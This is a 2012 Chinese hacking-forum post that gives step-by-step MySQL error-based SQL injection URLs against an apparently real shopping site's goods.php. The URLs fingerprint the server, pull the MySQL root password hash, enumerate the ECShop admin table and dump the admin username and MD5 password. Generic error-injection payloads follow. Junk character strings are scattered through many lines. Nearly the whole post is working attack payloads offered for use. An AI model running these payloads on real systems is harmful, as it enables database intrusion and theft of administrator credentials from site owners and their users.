找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2067|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ! w& @( M7 _, J
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 y; h  S6 u: B, Y$ f
' ~( s9 p) O  ?& @5 k% B
判断系统
+ _2 ?9 @3 W& o* Q
" ?; e, o& u  ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& ^& F+ g/ m5 x9 J8 ~$ T( |4 R
1 k# N5 e  M  F9 U! D) r( F1 m/ d
6 \, j3 r% B  x5 a) ]

% L0 P0 J& }0 L8 j8 `* E当前 user()
6 G# @( v6 R" _, |5 K9 y) n. Q, E; e% E
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! _$ M' d( z7 ^8 D! k3 O. [! e5 G" I0 z4 y5 J6 Q/ n

: ?  r' d7 H, O4 S+ w  F0 a  ]$ c; z) v5 \% X
当前 database()& a5 f1 R6 x1 O' G# M% o+ a
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ U+ j  I& S3 {8 A1 J+ ?. B( N: j! E  o: A7 w
. a7 x: K" Q, Y6 P1 J
4 N$ ]1 f' b: P& }# X" \7 r
/ n+ ?  M' ~5 |. H8 D) y8 z
root hash( o6 e3 N, b" \) S

4 ?" Q. Z& j3 U% M, p9 }- R& {) ^1 ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 G0 F  C! A" i
" m* P' S& z& g! |3 t- `
- h- ^9 C7 s! `% ]% q( T1 s0 e! S* t8 n# v9 m0 a
当前 数据库表名7 C- w; e8 ~4 E# n# U5 o+ U

9 _4 r/ w5 G+ S% F( t: V) T+ yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
; T6 j- b5 j& d- j  p, ~! J  e2 o0 H# s- I. C9 Y5 U
. W9 i' i+ O( m' n# C7 \% ~

3 u/ W$ l: V) u* y( U$ b当前 数据库 user_name 字段2 u, }  |# p- Z' R/ e5 {
, {2 [8 L+ R: u! I  |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% o$ G: u- u, Q- u+ I8 h
# z" s* E7 C) s1 Z) t, [0 B! e
当前 数据库 字段 password5 P. h. g) g8 `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 T( }6 y# I& a( e- d5 g, \+ ^5 n4 e. ^, \

, p/ E  V  d4 x" c0 X+ D1 D
7 L' Y1 A4 M1 ^. E获得 admin passwd(md5)7 _- y. @! y' @; R

! q* U7 e& x$ p0 v6 h3 Z5 y! H. X- h; L
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ b" O0 I/ \# g7 D9 A* o- d2 P. ?4 k$ i& V, I
报错注射
5 f- d$ ]% l/ K' e% G5 Z1 TSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
9 L: `6 }' O( o% u2 u  t
) R) L# `* |+ d. q; _; X( MSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)$ D5 z" f8 b/ P. b0 l
" O) C8 g: Z" }% d
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表